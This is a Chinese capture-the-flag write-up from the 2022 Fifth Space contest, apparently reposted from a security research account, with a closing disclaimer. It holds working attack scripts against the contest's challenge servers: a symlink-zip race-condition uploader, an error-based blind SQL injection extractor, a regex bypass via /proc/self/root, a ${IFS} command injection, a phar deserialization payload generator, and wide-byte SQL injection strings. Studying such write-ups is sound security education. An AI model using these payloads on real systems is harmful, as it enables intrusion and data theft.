-
5_简单的Base
attack1（持续上传"软链接版"zip，让 `123` 这个条目尽量多地以指向 /flag 的软链接形式落盘）:
from pwn import *
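ip = "39.106.134.45"
port = 15342
r2 = remote(ip, port)
# Stored zip with one entry named `123` (5 bytes, content "/flag"). Its
# central-directory external attributes are 0xA1FF0000, i.e. Unix mode
# 0120777: the entry is a *symlink* to /flag. The second script uploads the
# same archive with attributes 0 (a regular file) and downloads it; whichever
# version is on disk at read time decides what comes back.
payload_exp = "UEsDBAoAAAAAANszM1VOewN1BQAAAAUAAAADABwAMTIzVVQJAAOeDChjoAwoY3V4CwABBOcDAAAE5wMAAC9mbGFnUEsBAh4DCgAAAAAA2zMzVU57A3UFAAAABQAAAAMAGAAAAAAAAAAAAP+hAAAAADEyM1VUBQADngwoY3V4CwABBOcDAAAE5wMAAFBLBQYAAAAAAQABAEkAAABCAAAAAAA="
# Hammer the upload endpoint on one connection until killed; the menu prompt
# is deliberately not waited for (the original had that recvuntil commented
# out) so the symlink version is re-uploaded as fast as the service accepts it.
# Bytes are sent explicitly so this works on both Python 2 and 3 pwntools.
while True:
    r2.sendline(b"4")
    r2.recvuntil(b"Base64-encoded zip of sakanas:")
    r2.sendline(payload_exp.encode())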
attack2（上传同名的"普通文件版"zip 后立刻下载 0 号 sakana，赌这一刻磁盘上的 `123` 已被 attack1 换成软链接）:
from pwn import *
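context(os="linux", arch="amd64", log_level="CRITICAL")
import os
ip = "39.106.134.45"
port = 15342
# Same archive as the symlink payload except that entry `123` carries external
# attributes 0 in the central directory, i.e. a regular file whose content is
# the 5 bytes "/flag". This is the version that passes the upload check.
payload_pass = "UEsDBAoAAAAAANszM1VOewN1BQAAAAUAAAADABwAMTIzVVQJAAOeDChjoAwoY3V4CwABBOcDAAAE5wMAAC9mbGFnUEsBAh4DCgAAAAAA2zMzVU57A3UFAAAABQAAAAMAGAAAAAAAAAAAAAAAAAAAADEyM1VUBQADngwoY3V4CwABBOcDAAAE5wMAAFBLBQYAAAAAAQABAEkAAABCAAAAAAA="
# Race loop: upload the regular-file zip, then immediately download sakana 0.
# If the other script's symlink version of `123` landed on disk in between,
# the download returns the contents of /flag.
# The pasted original had `while 0:` here, which never runs a single
# iteration; the write-up says both scripts are run together, so loop forever.
while True:
    tube = None
    try:
        tube = remote(ip, port)
        # The pasted prompt "Input your choicen>>" has most likely lost a
        # backslash ("choice\n>>"); anchoring on the trailing ">>" matches
        # either reading instead of hanging on text that never arrives.
        tube.recvuntil(b">>")
        tube.sendline(b"4")
        tube.recvuntil(b"Base64-encoded zip of sakanas:")
        tube.sendline(payload_pass.encode())
        tube.sendline(b"2")
        tube.recvuntil(b"sakana to download")
        tube.sendline(b"0")
        out = tube.recv()
        # pwntools on Python 3 returns bytes: `str in bytes` raised TypeError,
        # which the bare except swallowed, so the loop could never break.
        if b"Here is your sakana file" in out:
            print(out)
            break
    except Exception:
        # connection reset / EOF / timeout mid-race: just try again
        pass
    finally:
        # every iteration opened a fresh connection and the original never
        # closed it on the no-match path; close it here so fds don't pile up
        if tube is not None:
            tube.close()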
两个脚本同时运行跑条件竞争：attack1 反复上传的 zip 里 `123` 是指向 /flag 的软链接（central directory 外部属性 0xA1FF0000），attack2 上传的同名 `123` 是内容为 "/flag" 的普通文件并随即下载；只要下载发生在软链接版本落盘的窗口内，返回的 "Here is your sakana file" 后面就是 /flag 的内容。
-
5_web_Eeeeasy_SQL
#导入requests包
import urllib
import urllib.parse

import requests
# Target login endpoint; the POSTed `username`/`password` form fields are the
# injection point used by the loop below.
url = "http://39.106.158.135:22333/api/api.php?command=login"
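def ord2hex(string):
    """Return *string* as a MySQL hex literal (``"ab"`` -> ``"0x6162"``).

    The injection point cannot contain quotes, and ``LOCATE()`` accepts a hex
    literal in place of a quoted string, so prefixes are compared this way.

    Args:
        string: text whose code points are rendered as lowercase hex.

    Returns:
        ``"0x"`` followed by the hex of every code point; ``"0x"`` for ``""``.
    """
    # hex(ord(ch)) drops the leading zero for code points below 0x10, which
    # would misalign every following byte of the literal; "02x" keeps each
    # byte two digits (code points above 0xff still render in full).
    return "0x" + "".join(format(ord(ch), "02x") for ch in string)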
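# Candidate characters, tried in this order at every position. hex(username)
# can only yield 0-9A-F, but the same loop was first pointed at version(), so
# the set is kept broad enough for arbitrary text.
chars = '0123456789.,abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ{}_!@#$%^&*()'
# Characters recovered so far; grows by one per successful probe.
# (The original also set an unused `flag = 0`, dropped here.)
res = ""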
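# Error-based blind extraction, one character per inner loop:
#   LOCATE(<hex of res+c>, <target>) is 1 exactly when res+c is a prefix of
#   the target; ELT(1, i) then yields i (non-zero, so truthy) and cot(0)
#   raises a MySQL error, which the API answers with a short body. Otherwise
#   the CASE yields 1 and the normal, long login response comes back.
# %09 is a tab: spaces are filtered, tabs still separate SQL tokens.
target = "hex(username)"  # first probe used version(); swap in other columns here
probe = "or%09case%09when%09ELT(LOCATE({},{}),{})%09then%09cot(0)%09else%091%09end#"
for i in range(1, 300):
    matched = False
    for c in chars:
        payload = urllib.parse.unquote(probe.format(ord2hex(res + c), target, i))
        # The trailing backslash escapes the closing quote of the username
        # literal in the query, so the whole password value continues the SQL
        # statement. (The pasted "admin\" was an unterminated Python string.)
        d = {"username": "admin\\", "password": payload}
        rep = requests.post(url, data=d, allow_redirects=False)
        # a SQL error yields a short body; anything >= 10 chars is the normal page
        if len(rep.text) < 10:
            res += c
            matched = True
            print("[*]已提取: " + res)
            break
    if not matched:
        # No candidate extends the prefix: the value is complete (or contains a
        # character outside `chars`); the original kept sending 300*len(chars)
        # requests for nothing.
        break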
把 payload 中的目标列分别换成 hex(username) 和 hex(password)，逐字符注出后解码，即可登录。
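<?php
session_start();
if(isset($_SESSION['name'])){
    if($_SESSION['name'] === 'Flag_Account'){
        // $_GET['file'] is already URL-decoded by PHP; urldecode() decodes it a
        // second time, and the blacklist below is applied to the decoded value.
        $file = urldecode($_GET['file']);
        // Blacklist of path fragments. As pasted on the page the pattern had
        // lost its backslashes ("^/flag" and a bare "."): with "/" as delimiter
        // that is not a valid PCRE, and a bare "." would reject every file,
        // neither of which fits the bypass described below. The escaped form
        // is the reading consistent with the write-up: only a *leading* /flag
        // is rejected, and "proc" is not on the list.
        if(!preg_match('/^\/flag|var|tmp|php|log|%|sess|etc|usr|\.|:|base|ssh|http/i',$file)){
            readfile($file);
        }else{
            echo 'try again~';
        }
    }
    show_source(__FILE__);
}else{
    echo '登陆一下吧~';
}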
不能直接用 /flag：正则 `^\/flag` 只拦截以 /flag 开头的路径，而 `proc` 不在黑名单里，/proc/self/root 又是当前进程根目录的链接，所以 /proc/self/root/flag 即可绕过。
-
5_web_letmeguess_1
admin admin123弱口令登录。
`$(tar${IFS}cvf${IFS}index${IFS}.)`：命令注入，`${IFS}` 代替被过滤的空格，把当前目录整个打包成 index，然后下载 index 解压得到 flag。
-
5_web_BaliYun
从 www.zip 泄露的源码中拿到 upload 类，利用 phar 反序列化：生成如下 phar，metadata 里放入 filename 指向 /flag 的 upload 对象，目标以 phar:// 打开该文件时即反序列化：
<?php
// Gadget class mirrored from the target's source (www.zip); only the property
// names matter here, the values are restored by unserialize() on the target.
class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;
}
// Phar::setMetadata() serializes the object into the archive manifest, which
// is unserialized when the archive is opened through the phar:// wrapper.
// NOTE: writing a phar needs phar.readonly=0 (e.g. `php -d phar.readonly=0 gen.php`).
@unlink("test.phar");
$archive = new Phar("test.phar");   // the extension must be .phar for Phar to write it
$archive->startBuffering();
$archive->setStub("<?php __HALT_COMPILER(); ?>");   // minimal stub
$gadget = new upload();
$gadget->filename = "/flag";
$archive->setMetadata($gadget);
$archive->addFromString("test.txt", "test");   // any file entry so the archive is non-empty
$archive->stopBuffering();
-
5_easylogin
SQL 注入。Burp 抓包时响应里出现 GBK 乱码，意识到是宽字节注入：`%df` 与服务端用来转义单引号的 `\`（0x5c）拼成一个 GBK 双字节字符，单引号因此逃逸出字符串。
username=admin%df'&password=admin
报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin�''' at line 1 （这里的 `�` 就是 %df 那个字节，它吃掉了转义用的反斜杠，单引号得以闭合字符串，证明宽字节注入成立。）
测试联合注入发现:
总是出现语法错误，排查后发现 select、union 等关键字会被替换为空，双写（如 selselectect、ununionion）即可绕过。
直接用联合注入伪造的明文密码无法登录，联想到常规站点开发会先对密码做 md5 再比对，于是在联合查询中返回密码的 md5 值；由于无法使用引号，字符串改用 16 进制字面量（0x...）表示。
原文始发于微信公众号(山石网科安全技术研究院):2022年第五空间网络安全大赛WriteUp | Web & Misc
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。